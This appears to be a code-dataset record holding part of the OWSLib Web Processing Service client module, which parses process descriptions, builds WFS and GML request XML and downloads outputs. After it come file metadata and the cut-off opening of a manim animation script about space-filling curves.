# </ComplexData>
# OR
# <ComplexOutput defaultEncoding="UTF-8" defaultFormat="text/XML" defaultSchema="NONE">
# <SupportedComplexData>
# <Format>text/XML</Format>
# <Encoding>UTF-8</Encoding>
# <Schema>NONE</Schema>
# </SupportedComplexData>
# </ComplexOutput>
complex_data_element = element.find(complexDataElementName)
if complex_data_element is not None:
self.dataType = "ComplexData"
for supported_comlexdata_element in\
complex_data_element.findall('SupportedComplexData'):
self.supportedValues.append(
ComplexData(
mimeType=testXMLValue(
supported_comlexdata_element.find('Format')),
encoding=testXMLValue(
supported_comlexdata_element.find('Encoding')),
schema=testXMLValue(
supported_comlexdata_element.find('Schema'))
)
)
for format_element in\
complex_data_element.findall('Supported/Format'):
self.supportedValues.append(
ComplexData(
mimeType=testXMLValue(format_element.find('MimeType')),
encoding=testXMLValue(format_element.find('Encoding')),
schema=testXMLValue(format_element.find('Schema'))
)
)
default_format_element = complex_data_element.find('Default/Format')
if default_format_element is not None:
self.defaultValue = ComplexData(
mimeType=testXMLValue(
default_format_element.find('MimeType')),
encoding=testXMLValue(
default_format_element.find('Encoding')),
schema=testXMLValue(default_format_element.find('Schema'))
)
def _parseBoundingBoxData(self, element, bboxElementName):
"""
Method to parse the BoundingBoxData element.
"""
# <BoundingBoxData>
# <Default>
# <CRS>epsg:4326</CRS>
# </Default>
# <Supported>
# <CRS>epsg:4326</CRS>
# </Supported>
# </BoundingBoxData>
#
# OR
#
# <BoundingBoxOutput>
# <Default>
# <CRS>epsg:4326</CRS>
# </Default>
# <Supported>
# <CRS>epsg:4326</CRS>
# </Supported>
# </BoundingBoxOutput>
bbox_data_element = element.find(bboxElementName)
if bbox_data_element is not None:
self.dataType = 'BoundingBoxData'
for bbox_element in bbox_data_element.findall('Supported/CRS'):
self.supportedValues.append(bbox_element.text)
default_bbox_element = bbox_data_element.find('Default/CRS')
if default_bbox_element is not None:
self.defaultValue = default_bbox_element.text
class Input(InputOutput):
"""
Class that represents a WPS process input.
"""
def __init__(self, inputElement):
# superclass initializer
super(Input, self).__init__(inputElement)
# <Input maxOccurs="1" minOccurs="0">
# OR
# <MinimumOccurs>1</MinimumOccurs>
self.minOccurs = -1
if inputElement.get("minOccurs") is not None:
self.minOccurs = int(inputElement.get("minOccurs"))
if inputElement.find('MinimumOccurs') is not None:
self.minOccurs = int(
testXMLValue(inputElement.find('MinimumOccurs')))
self.maxOccurs = -1
if inputElement.get("maxOccurs") is not None:
self.maxOccurs = int(inputElement.get("maxOccurs"))
if inputElement.find('MaximumOccurs') is not None:
self.maxOccurs = int(
testXMLValue(inputElement.find('MaximumOccurs')))
# <LiteralData>
self._parseLiteralData(inputElement, 'LiteralData')
# <ComplexData>
self._parseComplexData(inputElement, 'ComplexData')
# <BoundingBoxData>
self._parseBoundingBoxData(inputElement, 'BoundingBoxData')
class Output(InputOutput):
"""
Class that represents a WPS process output.
"""
def __init__(self, outputElement):
# superclass initializer
super(Output, self).__init__(outputElement)
self.reference = None
self.mimeType = None
self.data = []
self.fileName = None
self.filePath = None
# extract wps namespace from outputElement itself
wpsns = getNamespace(outputElement)
# <ns:Reference encoding="UTF-8" mimeType="text/csv"
# href="http://cida.usgs.gov/climate/gdp/process/RetrieveResultServlet?id=1318528582026OUTPUT.601bb3d0-547f-4eab-8642-7c7d2834459e"
# />
referenceElement = outputElement.find(nspath('Reference', ns=wpsns))
if referenceElement is not None:
# extract xlink namespace
xlinkns = get_namespaces()['xlink']
xlink_href = '{{{}}}href'.format(xlinkns)
if xlink_href in list(referenceElement.keys()):
self.reference = referenceElement.get(xlink_href)
else:
self.reference = referenceElement.get('href')
self.mimeType = referenceElement.get('mimeType')
# <LiteralOutput>
self._parseLiteralData(outputElement, 'LiteralOutput')
# <ComplexData> or <ComplexOutput>
self._parseComplexData(outputElement, 'ComplexOutput')
# <BoundingBoxOutput>
self._parseBoundingBoxData(outputElement, 'BoundingBoxOutput')
# <Data>
# <ns0:Data>
# <ns0:ComplexData mimeType="text/plain">
# 7504912.93758151 -764109.175074507,7750849.82379226 -22141.8611641468,8561828.42371234 -897195.923493867,7724946.16844165 -602984.014261927 # noqa
# </ns0:ComplexData>
# </ns0:Data>
# OR:
# <ns0:Data>
# <ns0:ComplexData encoding="UTF-8" mimeType="text/xml" schema="http://schemas.opengis.net/gml/2.1.2/feature.xsd"> # noqa
# <ns3:FeatureCollection xsi:schemaLocation="http://ogr.maptools.org/ output_0n7ij9D.xsd" xmlns:ns3="http://ogr.maptools.org/"> # noqa
# <gml:boundedBy xmlns:gml="http://www.opengis.net/gml">
# <gml:Box>
# <gml:coord><gml:X>-960123.1421801626</gml:X><gml:Y>4665723.56559387</gml:Y></gml:coord>
# <gml:coord><gml:X>-101288.6510608822</gml:X><gml:Y>5108200.011823481</gml:Y></gml:coord>
# </gml:Box>
# </gml:boundedBy>
# <gml:featureMember xmlns:gml="http://www.opengis.net/gml">
# <ns3:output fid="F0">
# <ns3:geometryProperty><gml:LineString><gml:coordinates>-960123.142180162365548,4665723.565593870356679,0 -960123.142180162365548,4665723.565593870356679,0 -960123.142180162598379,4665723.565593870356679,0 -960123.142180162598379,4665723.565593870356679,0 -711230.141176006174646,4710278.48552671354264,0 -711230.141176006174646,4710278.48552671354264,0 -623656.677859728806652,4848552.374973464757204,0 -623656.677859728806652,4848552.374973464757204,0 # noqa -410100.337491964863148,4923834.82589447684586,0 -410100.337491964863148,4923834.82589447684586,0 -101288.651060882242746,5108200.011823480948806,0 -101288.651060882242746,5108200.011823480948806,0 -101288.651060882257298,5108200.011823480948806,0 -101288.651060882257298,5108200.011823480948806,0</gml:coordinates></gml:LineString></ns3:geometryProperty>
# <ns3:cat>1</ns3:cat>
# <ns3:id>1</ns3:id>
# <ns3:fcat>0</ns3:fcat>
# <ns3:tcat>0</ns3:tcat>
# <ns3:sp>0</ns3:sp>
# <ns3:cost>1002619.181</ns3:cost>
# <ns3:fdist>0</ns3:fdist>
# <ns3:tdist>0</ns3:tdist>
# </ns3:output>
# </gml:featureMember>
# </ns3:FeatureCollection>
# </ns0:ComplexData>
# </ns0:Data>
#
#
# OWS BoundingBox:
#
# <wps:Data>
# <ows:BoundingBox crs="EPSG:4326" dimensions="2">
# <ows:LowerCorner>0.0 -90.0</ows:LowerCorner>
# <ows:UpperCorner>180.0 90.0</ows:UpperCorner>
# </ows:BoundingBox>
# </wps:Data>
#
dataElement = outputElement.find(nspath('Data', ns=wpsns))
if dataElement is not None:
complexDataElement = dataElement.find(
nspath('ComplexData', ns=wpsns))
if complexDataElement is not None:
self.dataType = "ComplexData"
self.mimeType = complexDataElement.get('mimeType')
if complexDataElement.text is not None and complexDataElement.text.strip() != '':
self.data.append(complexDataElement.text.strip())
for child in complexDataElement:
self.data.append(etree.tostring(child))
literalDataElement = dataElement.find(
nspath('LiteralData', ns=wpsns))
if literalDataElement is not None:
self.dataType = literalDataElement.get('dataType')
if literalDataElement.text is not None and literalDataElement.text.strip() != '':
self.data.append(literalDataElement.text.strip())
bboxDataElement = dataElement.find(nspath('BoundingBox', ns=namespaces['ows']))
            if bboxDataElement is None:
# TODO: just a workaround for data-inputs in lineage
bboxDataElement = dataElement.find(nspath('BoundingBoxData', ns=namespaces['wps']))
if bboxDataElement is not None:
self.dataType = "BoundingBoxData"
bbox = BoundingBox(bboxDataElement)
if bbox:
self.data.append(bbox)
def retrieveData(self, username=None, password=None, headers=None, verify=True, cert=None):
"""
Method to retrieve data from server-side reference:
returns "" if the reference is not known.
:param username: credentials to access the remote WPS server
:param password: credentials to access the remote WPS server
"""
url = self.reference
if url is None:
return b''
# a) 'http://cida.usgs.gov/climate/gdp/process/RetrieveResultServlet?id=1318528582026OUTPUT.601bb3d0-547f-4eab-8642-7c7d2834459e' # noqa
# b) 'http://rsg.pml.ac.uk/wps/wpsoutputs/outputImage-11294Bd6l2a.tif'
log.info('Output URL=%s' % url)
if '?' in url:
spliturl = url.split('?')
u = openURL(spliturl[0], spliturl[
1], method='Get', username=username, password=password,
headers=headers, verify=verify, cert=cert)
# extract output filepath from URL query string
self.fileName = spliturl[1].split('=')[1]
else:
u = openURL(
url, '', method='Get', username=username, password=password,
headers=headers, verify=verify, cert=cert)
# extract output filepath from base URL
self.fileName = url.split('/')[-1]
return u.read()
def writeToDisk(self, path=None, username=None, password=None,
headers=None, verify=True, cert=None):
"""
Method to write an output of a WPS process to disk:
        it either retrieves the referenced file from the server, or writes out the content of response embedded output.
        :param path: optional path to the output file, otherwise a file will be created in the local directory
            with the name assigned by the server.
:param username: credentials to access the remote WPS server
:param password: credentials to access the remote WPS server
"""
# Check if ExecuteResponse contains reference to server-side output
content = self.retrieveData(username, password, headers=headers, verify=verify, cert=cert)
        # ExecuteResponse contains embedded output
        if content == b'' and len(self.data) > 0:
            self.fileName = self.identifier
            for data in self.data:
                # embedded data may be str or bytes (e.g. from etree.tostring)
                content = content + (data if isinstance(data, bytes) else str(data).encode())
        # write out content
        if content != b'':
if self.fileName == "":
self.fileName = self.identifier
self.filePath = path + self.fileName
out = open(self.filePath, 'wb')
out.write(content)
out.close()
log.info('Output written to file: %s' % self.filePath)
class WPSException:
"""
Class representing an exception raised by a WPS.
"""
def __init__(self, root):
self.code = root.attrib.get("exceptionCode", None)
self.locator = root.attrib.get("locator", None)
textEl = root.find(nspath('ExceptionText', ns=getNamespace(root)))
if textEl is not None:
self.text = textEl.text
else:
self.text = ""
class Metadata(object):
"""Initialize an OWS Metadata construct"""
def __init__(self, elem, namespace=DEFAULT_OWS_NAMESPACE):
self.url = None
self.title = None
self.role = None
if elem is not None:
urlattrib = elem.attrib.get(nspath('href', XLINK_NAMESPACE))
if urlattrib is not None:
self.url = testXMLValue(urlattrib, True)
titleattrib = elem.attrib.get(nspath('title', XLINK_NAMESPACE))
if titleattrib is not None:
self.title = testXMLValue(titleattrib, True)
roleattrib = elem.attrib.get(nspath('role', XLINK_NAMESPACE))
if roleattrib is not None:
self.role = testXMLValue(roleattrib, True)
class Process(object):
"""
Class that represents a WPS process.
"""
def __init__(self, elem, verbose=False):
""" Initialization method extracts all available metadata from an XML document (passed in as etree object) """
# <ns0:ProcessDescriptions service="WPS" version="1.0.0"
# xsi:schemaLocation="http://www.opengis.net/wps/1.0.0 http://schemas.opengis.net/wps/1.0.0/wpsDescribeProcess_response.xsd" # noqa
# xml:lang="en-US" xmlns:ns0="http://www.opengis.net/wps/1.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> # noqa
# OR:
# <ns0:Process ns0:processVersion="1.0.0">
self._root = elem
self.verbose = verbose
wpsns = getNamespace(elem)
def get_bool_attribute(elem, attribute):
property = elem.get(attribute, '').lower()
if property == 'true':
value = True
elif property == 'false':
value = False
else:
value = None
return value
# <ProcessDescription statusSupported="true" storeSupported="true" ns0:processVersion="1.0.0">
self.processVersion = elem.get(nspath('processVersion', ns=wpsns))
self.statusSupported = get_bool_attribute(elem, "statusSupported")
self.storeSupported = get_bool_attribute(elem, "storeSupported")
self.identifier = None
self.title = None
self.abstract = None
self.metadata = []
for child in elem:
# this element's namespace
# TODO: ns not used
# ns = getNamespace(child)
# <ows:Identifier xmlns:ows="http://www.opengis.net/ows/1.1">
# gov.usgs.cida.gdp.wps.algorithm.FeatureWeightedGridStatisticsAlgorithm
# </ows:Identifier>
if child.tag.endswith('Identifier'):
self.identifier = testXMLValue(child)
# <ows:Title xmlns:ows="http://www.opengis.net/ows/1.1">
# Feature Weighted Grid Statistics
# </ows:Title>
elif child.tag.endswith('Title'):
self.title = testXMLValue(child)
# <ows:Abstract xmlns:ows="http://www.opengis.net/ows/1.1">
# This algorithm generates area weighted statistics of a gridded dataset for
# a set of vector polygon features. Using the bounding-box that encloses
# the feature data and the time range, if provided, a subset of the gridded dataset
# is requested from the remote gridded data server.
# Polygon representations are generated for cells in the retrieved grid.
# The polygon grid-cell representations are then projected to the feature data
# coordinate reference system. The grid-cells are used to calculate per grid-cell
# feature coverage fractions. Area-weighted statistics are then calculated for each feature
# using the grid values and fractions as weights. If the gridded dataset has a time range
# the last step is repeated for each time step within the time range or all time steps
# if a time range was not supplied.
# </ows:Abstract>
elif child.tag.endswith('Abstract'):
self.abstract = testXMLValue(child)
# <ows:Metadata xlink:title="Documentation" xlink:href="http://emu.readthedocs.org/en/latest/"/>
elif child.tag.endswith('Metadata'):
self.metadata.append(Metadata(child))
if self.verbose is True:
dump(self)
# <DataInputs>
self.dataInputs = []
for inputElement in elem.findall('DataInputs/Input'):
self.dataInputs.append(Input(inputElement))
if self.verbose is True:
dump(self.dataInputs[-1], prefix='\tInput: ')
# <ProcessOutputs>
self.processOutputs = []
for outputElement in elem.findall('ProcessOutputs/Output'):
self.processOutputs.append(Output(outputElement))
if self.verbose is True:
dump(self.processOutputs[-1], prefix='\tOutput: ')
def __str__(self):
return "WPS Process: {}, title={}".format(self.identifier or '', self.title or '')
def __repr__(self):
return "<owslib.wps.Process {}>".format(self.identifier or '')
class BoundingBoxDataInput(object):
"""
Data input class for ``wps:BoundingBoxData``.
:param list data: Coordinates of lower and upper corner. Example [10, 50, 20, 60]
with lower corner=[10, 50] and upper corner=[20, 60].
:param str crs: Name of coordinate reference system. Default: "epsg:4326".
"""
def __init__(self, data, crs=None, dimensions=2):
if isinstance(data, list):
self.data = data
else:
# convenience method for string input
self.data = [float(number) for number in data.split(',')]
self.lower_corner = (self.data[0], self.data[1])
self.upper_corner = (self.data[2], self.data[3])
self.dimensions = dimensions
self.crs = crs or 'epsg:4326'
def get_xml(self):
"""
Method that returns the object data as an XML snippet,
to be inserted into the WPS request document sent to the server.
"""
'''
<wps:Data>
<wps:BoundingBoxData crs="EPSG:4326" dimenstions="2">
<ows:LowerCorner>51.9 7.0</ows:LowerCorner>
<ows:UpperCorner>53.0 8.0</ows:UpperCorner>
</wps:BoundingBoxData>
</wps:Data>
'''
data_el = etree.Element(nspath_eval('wps:Data', namespaces))
attrib = dict()
if self.crs:
attrib['crs'] = self.crs
if self.dimensions:
attrib['dimensions'] = str(self.dimensions)
bbox_el = etree.SubElement(
data_el, nspath_eval('wps:BoundingBoxData', namespaces), attrib=attrib)
lc_el = etree.SubElement(
bbox_el, nspath_eval('ows:LowerCorner', namespaces))
lc_el.text = "{0[0]} {0[1]}".format(self.lower_corner)
uc_el = etree.SubElement(
bbox_el, nspath_eval('ows:UpperCorner', namespaces))
uc_el.text = "{0[0]} {0[1]}".format(self.upper_corner)
return data_el
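# Illustrative (commented) construction; both forms are equivalent, since the
# initializer above splits a comma-separated string into floats:
#
#   bbox = BoundingBoxDataInput([10, 50, 20, 60], crs='epsg:4326')
#   bbox = BoundingBoxDataInput('10,50,20,60', crs='epsg:4326')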
class ComplexDataInput(IComplexDataInput, ComplexData):
def __init__(self, value, mimeType=None, encoding=None, schema=None):
super(ComplexDataInput, self).__init__(
mimeType=mimeType, encoding=encoding, schema=schema)
self.value = value
def getXml(self):
if is_reference(self.value):
return self.complexDataAsReference()
else:
return self.complexDataRaw()
def complexDataAsReference(self):
"""
<wps:Reference xlink:href="http://somewhere/test.xml"/>
"""
attrib = {nspath_eval("xlink:href", namespaces): self.value}
if self.encoding:
attrib['encoding'] = self.encoding
if self.schema:
attrib['schema'] = self.schema
if self.mimeType:
attrib['mimeType'] = self.mimeType
refElement = etree.Element(nspath_eval('wps:Reference', namespaces), attrib)
return refElement
def complexDataRaw(self):
'''
<wps:Data>
<wps:ComplexData mimeType="text/xml" encoding="UTF-8"
schema="http://schemas.opengis.net/gml/3.1.1/base/feature.xsd">
</wps:ComplexData>
</wps:Data>
'''
dataElement = etree.Element(nspath_eval('wps:Data', namespaces))
attrib = dict()
if self.encoding:
attrib['encoding'] = self.encoding
if self.schema:
attrib['schema'] = self.schema
if self.mimeType:
attrib['mimeType'] = self.mimeType
complexDataElement = etree.SubElement(
dataElement, nspath_eval('wps:ComplexData', namespaces), attrib=attrib)
complexDataElement.text = self.value
return dataElement
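# Illustrative (commented) use of ComplexDataInput: a URL value is emitted as a
# wps:Reference by getXml() (via is_reference), while any other string is embedded
# as raw wps:ComplexData. The URL below is a placeholder:
#
#   by_reference = ComplexDataInput('http://example.org/data.xml', mimeType='text/xml')
#   embedded = ComplexDataInput('<data>inline payload</data>', mimeType='text/xml')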
class FeatureCollection(IComplexDataInput):
'''
Base class to represent a Feature Collection used as input to a WPS request.
The method getXml() is invoked by the WPS execute() method to build the WPS request.
All subclasses must implement the getXml() method to provide their specific XML.
Implements IComplexDataInput.
'''
def __init__(self):
pass
def getXml(self):
raise NotImplementedError
class WFSFeatureCollection(FeatureCollection):
'''
FeatureCollection specified by a WFS query.
All subclasses must implement the getQuery() method to provide the specific query portion of the XML.
'''
def __init__(self, wfsUrl, wfsQuery, wfsMethod=None):
'''
wfsUrl: the WFS service URL
example: wfsUrl = "http://igsarm-cida-gdp2.er.usgs.gov:8082/geoserver/wfs"
wfsQuery : a WFS query instance
'''
self.url = wfsUrl
self.query = wfsQuery
self.method = wfsMethod
# <wps:Reference xlink:href="http://igsarm-cida-gdp2.er.usgs.gov:8082/geoserver/wfs">
# <wps:Body>
# <wfs:GetFeature xmlns:wfs="http://www.opengis.net/wfs" xmlns:ogc="http://www.opengis.net/ogc" xmlns:gml="http://www.opengis.net/gml" service="WFS" version="1.1.0" outputFormat="text/xml; subtype=gml/3.1.1" xsi:schemaLocation="http://www.opengis.net/wfs ../wfs/1.1.0/WFS.xsd"> # noqa
# .......
# </wfs:GetFeature>
# </wps:Body>
# </wps:Reference>
def getXml(self):
root = etree.Element(nspath_eval('wps:Reference', namespaces),
attrib={nspath_eval("xlink:href", namespaces): self.url})
if self.method:
root.attrib['method'] = self.method
bodyElement = etree.SubElement(
root, nspath_eval('wps:Body', namespaces))
getFeatureElement = etree.SubElement(
bodyElement, nspath_eval('wfs:GetFeature', namespaces),
attrib={"service": "WFS",
"version": "1.1.0",
"outputFormat": "text/xml; subtype=gml/3.1.1",
nspath_eval("xsi:schemaLocation", namespaces): "%s %s" % (namespaces['wfs'], WFS_SCHEMA_LOCATION)})
# <wfs:Query typeName="sample:CONUS_States">
# <wfs:PropertyName>the_geom</wfs:PropertyName>
# <wfs:PropertyName>STATE</wfs:PropertyName>
# <ogc:Filter>
# <ogc:GmlObjectId gml:id="CONUS_States.508"/>
# </ogc:Filter>
# </wfs:Query>
getFeatureElement.append(self.query.getXml())
return root
class WFSQuery(IComplexDataInput):
'''
Class representing a WFS query, for insertion into a WFSFeatureCollection instance.
Implements IComplexDataInput.
'''
def __init__(self, typeName, propertyNames=[], filters=[]):
self.typeName = typeName
self.propertyNames = propertyNames
self.filters = filters
def getXml(self):
# <wfs:Query typeName="sample:CONUS_States">
# <wfs:PropertyName>the_geom</wfs:PropertyName>
# <wfs:PropertyName>STATE</wfs:PropertyName>
# <ogc:Filter>
# <ogc:GmlObjectId gml:id="CONUS_States.508"/>
# </ogc:Filter>
# </wfs:Query>
queryElement = etree.Element(
nspath_eval('wfs:Query', namespaces), attrib={"typeName": self.typeName})
for propertyName in self.propertyNames:
propertyNameElement = etree.SubElement(
queryElement, nspath_eval('wfs:PropertyName', namespaces))
propertyNameElement.text = propertyName
if len(self.filters) > 0:
filterElement = etree.SubElement(
queryElement, nspath_eval('ogc:Filter', namespaces))
for filter in self.filters:
# gmlObjectIdElement
etree.SubElement(
filterElement, nspath_eval('ogc:GmlObjectId', namespaces),
attrib={nspath_eval('gml:id', namespaces): filter})
return queryElement
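# A minimal usage sketch combining WFSQuery and WFSFeatureCollection (the WFS
# endpoint, type name and feature id below are illustrative placeholders):
#
#   query = WFSQuery("sample:CONUS_States",
#                    propertyNames=["the_geom", "STATE"],
#                    filters=["CONUS_States.508"])
#   feature_collection = WFSFeatureCollection("http://example.org/geoserver/wfs", query)
#
# feature_collection.getXml() then produces the <wps:Reference>/<wps:Body>/
# <wfs:GetFeature> fragment shown in the comments above.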
class GMLMultiPolygonFeatureCollection(FeatureCollection):
'''
Class that represents a FeatureCollection defined as a GML multi-polygon.
'''
def __init__(self, polygons):
'''
        Initializer accepts an array of polygons, where each polygon is an array of (lon, lat) tuples.
Example: polygons = [ [(-102.8184, 39.5273), (-102.8184, 37.418), (-101.2363, 37.418), (-101.2363, 39.5273), (-102.8184, 39.5273)], # noqa
[(-92.8184, 39.5273), (-92.8184, 37.418), (-91.2363, 37.418), (-91.2363, 39.5273), (-92.8184, 39.5273)] ]
'''
self.polygons = polygons
def getXml(self):
'''
<wps:Data>
<wps:ComplexData mimeType="text/xml" encoding="UTF-8"
schema="http://schemas.opengis.net/gml/3.1.1/base/feature.xsd">
<gml:featureMembers xmlns:ogc="http://www.opengis.net/ogc"
xmlns:draw="gov.usgs.cida.gdp.draw" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:ows="http://www.opengis.net/ows" xmlns:gml="http://www.opengis.net/gml"
xmlns:xlink="http://www.w3.org/1999/xlink"
xsi:schemaLocation="gov.usgs.cida.gdp.draw http://cida.usgs.gov/climate/derivative/xsd/draw.xsd"> # noqa
<gml:box gml:id="box.1">
<gml:the_geom>
<gml:MultiPolygon srsDimension="2"
srsName="http://www.opengis.net/gml/srs/epsg.xml#4326">
<gml:polygonMember>
<gml:Polygon>
<gml:exterior>
<gml:LinearRing>
<gml:posList>-102.8184 39.5273 -102.8184 37.418 -101.2363 37.418 -101.2363 39.5273 -102.8184 39.5273</gml:posList>
</gml:LinearRing>
</gml:exterior>
</gml:Polygon>
</gml:polygonMember>
</gml:MultiPolygon>
</gml:the_geom>
<gml:ID>0</gml:ID>
</gml:box>
</gml:featureMembers>
</wps:ComplexData>
</wps:Data>
'''
dataElement = etree.Element(nspath_eval('wps:Data', namespaces))
complexDataElement = etree.SubElement(
dataElement, nspath_eval('wps:ComplexData', namespaces),
attrib={"mimeType": "text/xml", "schema": GML_SCHEMA_LOCATION})
featureMembersElement = etree.SubElement(
complexDataElement, nspath_eval('gml:featureMembers', namespaces),
attrib={nspath_eval("xsi:schemaLocation", namespaces): "%s %s" % (DRAW_NAMESPACE, DRAW_SCHEMA_LOCATION)})
boxElement = etree.SubElement(featureMembersElement, nspath_eval(
'gml:box', namespaces), attrib={nspath_eval("gml:id", namespaces): "box.1"})
geomElement = etree.SubElement(
boxElement, nspath_eval('gml:the_geom', namespaces))
multiPolygonElement = etree.SubElement(
geomElement, nspath_eval('gml:MultiPolygon', namespaces),
attrib={"srsDimension": "2", "srsName": "http://www.opengis.net/gml/srs/epsg.xml#4326"})
for polygon in self.polygons:
polygonMemberElement = etree.SubElement(
multiPolygonElement, nspath_eval('gml:polygonMember', namespaces))
polygonElement = etree.SubElement(
polygonMemberElement, nspath_eval('gml:Polygon', namespaces))
exteriorElement = etree.SubElement(
polygonElement, nspath_eval('gml:exterior', namespaces))
linearRingElement = etree.SubElement(
exteriorElement, nspath_eval('gml:LinearRing', namespaces))
posListElement = etree.SubElement(
linearRingElement, nspath_eval('gml:posList', namespaces))
posListElement.text = ' '.join(
["%s %s" % (x, y) for x, y in polygon[:]])
idElement = etree.SubElement(
boxElement, nspath_eval('gml:ID', namespaces))
idElement.text = "0"
return dataElement
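# A minimal usage sketch for GMLMultiPolygonFeatureCollection; each polygon is a
# closed ring of coordinate tuples as in the initializer docstring above:
#
#   ring = [(-102.8184, 39.5273), (-102.8184, 37.418), (-101.2363, 37.418),
#           (-101.2363, 39.5273), (-102.8184, 39.5273)]
#   fc = GMLMultiPolygonFeatureCollection([ring])
#
# fc.getXml() returns the <wps:Data>/<wps:ComplexData> GML snippet documented in
# the getXml() docstring.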
def monitorExecution(execution, sleepSecs=3, download=False, filepath=None):
'''
    Convenience method to monitor the status of a WPS execution until it completes (successfully or not),
    and to write the output to a file after a successful job completion.
:param execution: WPSExecution instance
:param int sleepSecs: number of seconds to sleep in between check status invocations
:param download: True to download the output when the process terminates, False otherwise
    :param filepath: optional path to the output file (if download=True), otherwise the filepath
        will be inferred from the response document
'''
while execution.isComplete() is False:
execution.checkStatus(sleepSecs=sleepSecs)
log.info('Execution status: %s' % execution.status)
if execution.isSucceded():
if download:
execution.getOutput(filepath=filepath)
else:
for output in execution.processOutputs:
if output.reference is not None:
log.info('Output URL=%s' % output.reference)
else:
for ex in execution.errors:
log.error('Error: code=%s, locator=%s, text=%s' %
(ex.code, ex.locator, ex.text))
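# A minimal usage sketch for monitorExecution (the service URL, process identifier
# and input name are placeholders):
#
#   wps = WebProcessingService('http://example.org/wps')
#   execution = wps.execute('my.process.id', inputs=[('literal_in', '42')])
#   monitorExecution(execution, sleepSecs=5, download=True, filepath='output.xml')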
def printValue(value):
'''
Utility method to format a value for printing.
'''
# ComplexData type
if isinstance(value, ComplexData):
return "mimeType=%s, encoding=%s, schema=%s" % (value.mimeType, value.encoding, value.schema)
# other type
else:
return value
def printInputOutput(value, indent=''):
'''
Utility method to inspect an input/output element.
'''
# InputOutput fields
print(('{} identifier={}, title={}, abstract={}, data type={}'.format(
indent, value.identifier, value.title, value.abstract, value.dataType)))
for val in value.allowedValues:
print(('{} Allowed Value: {}'.format(indent, printValue(val))))
if value.anyValue:
print(' Any value allowed')
for val in value.supportedValues:
print(('{} Supported Value: {}'.format(indent, printValue(val))))
print(('{} Default Value: {} '.format(indent, printValue(value.defaultValue))))
# Input fields
if isinstance(value, Input):
print(('{} minOccurs={}, maxOccurs={}'.format(
indent, value.minOccurs, value.maxOccurs)))
# Output fields
if isinstance(value, Output):
print(('{} reference={}, mimeType={}'.format(
indent, value.reference, value.mimeType)))
for datum in value.data:
print(('{} Data Value: {}'.format(indent, printValue(datum))))
| 41.615946
| 846
| 0.596486
|
39424911686758463fc441efb68a58d69c144675
| 32,583
|
py
|
Python
|
from_3b1b/old/hilbert/section2.py
|
tigerking/manim2
|
93e8957e433b8e59acb5a5213a4074ee0125b823
|
[
"MIT"
] | null | null | null |
from_3b1b/old/hilbert/section2.py
|
tigerking/manim2
|
93e8957e433b8e59acb5a5213a4074ee0125b823
|
[
"MIT"
] | null | null | null |
from_3b1b/old/hilbert/section2.py
|
tigerking/manim2
|
93e8957e433b8e59acb5a5213a4074ee0125b823
|
[
"MIT"
] | null | null | null |
from manim2.imports import *
import displayer as disp
from hilbert.curves import \
TransformOverIncreasingOrders, FlowSnake, HilbertCurve, \
SnakeCurve, PeanoCurve
from hilbert.section1 import get_mathy_and_bubble
from scipy.spatial.distance import cdist
def get_time_line():
length = 2.6*FRAME_WIDTH
year_range = 400
time_line = NumberLine(
numerical_radius = year_range/2,
unit_length_to_spatial_width = length/year_range,
tick_frequency = 10,
leftmost_tick = 1720,
number_at_center = 1870,
numbers_with_elongated_ticks = list(range(1700, 2100, 100))
)
time_line.sort_points(lambda p : p[0])
time_line.set_color_by_gradient(
PeanoCurve.CONFIG["start_color"],
PeanoCurve.CONFIG["end_color"]
)
time_line.add_numbers(
2020, *list(range(1800, 2050, 50))
)
return time_line
class SectionTwo(Scene):
def construct(self):
self.add(TextMobject("Section 2: Filling space"))
self.wait()
class HilbertCurveIsPerfect(Scene):
def construct(self):
curve = HilbertCurve(order = 6)
curve.set_color(WHITE)
colored_curve = curve.copy()
colored_curve.thin_out(3)
lion = ImageMobject("lion", invert = False)
lion.replace(curve, stretch = True)
sparce_lion = lion.copy()
sparce_lion.thin_out(100)
distance_matrix = cdist(colored_curve.points, sparce_lion.points)
closest_point_indices = np.apply_along_axis(
np.argmin, 1, distance_matrix
)
colored_curve.rgbas = sparce_lion.rgbas[closest_point_indices]
line = Line(5*LEFT, 5*RIGHT)
Mobject.align_data(line, colored_curve)
line.rgbas = colored_curve.rgbas
self.add(lion)
self.play(ShowCreation(curve, run_time = 3))
self.play(
FadeOut(lion),
Transform(curve, colored_curve),
run_time = 3
)
self.wait()
self.play(Transform(curve, line, run_time = 5))
self.wait()
class AskMathematicianFriend(Scene):
def construct(self):
mathy, bubble = get_mathy_and_bubble()
bubble.sort_points(lambda p : np.dot(p, UP+RIGHT))
self.add(mathy)
self.wait()
self.play(ApplyMethod(
mathy.blink,
rate_func = squish_rate_func(there_and_back)
))
self.wait()
self.play(ShowCreation(bubble))
self.wait()
self.play(
ApplyMethod(mathy.shift, 3*(DOWN+LEFT)),
ApplyPointwiseFunction(
lambda p : 15*p/get_norm(p),
bubble
),
run_time = 3
)
class TimeLineAboutSpaceFilling(Scene):
def construct(self):
curve = PeanoCurve(order = 5)
curve.stretch_to_fit_width(FRAME_WIDTH)
curve.stretch_to_fit_height(FRAME_HEIGHT)
curve_start = curve.copy()
curve_start.apply_over_attr_arrays(
lambda arr : arr[:200]
)
time_line = get_time_line()
time_line.shift(-time_line.number_to_point(2000))
self.add(time_line)
self.play(ApplyMethod(
time_line.shift,
-time_line.number_to_point(1900),
run_time = 3
))
brace = Brace(
Mobject(
Point(time_line.number_to_point(1865)),
Point(time_line.number_to_point(1888)),
),
UP
)
words = TextMobject("""
Cantor drives himself (and the \\\\
mathematical community at large) \\\\
crazy with research on infinity.
""")
words.next_to(brace, UP)
self.play(
GrowFromCenter(brace),
ShimmerIn(words)
)
self.wait()
self.play(
Transform(time_line, curve_start),
FadeOut(brace),
FadeOut(words)
)
self.play(ShowCreation(
curve,
run_time = 5,
rate_func=linear
))
self.wait()
class NotPixelatedSpace(Scene):
def construct(self):
grid = Grid(64, 64)
space_region = Region()
space_mobject = MobjectFromRegion(space_region, DARK_GREY)
curve = PeanoCurve(order = 5).replace(space_mobject)
line = Line(5*LEFT, 5*RIGHT)
line.set_color_by_gradient(curve.start_color, curve.end_color)
for mob in grid, space_mobject:
mob.sort_points(get_norm)
infinitely = TextMobject("Infinitely")
detailed = TextMobject("detailed")
extending = TextMobject("extending")
detailed.next_to(infinitely, RIGHT)
extending.next_to(infinitely, RIGHT)
Mobject(extending, infinitely, detailed).center()
arrows = Mobject(*[
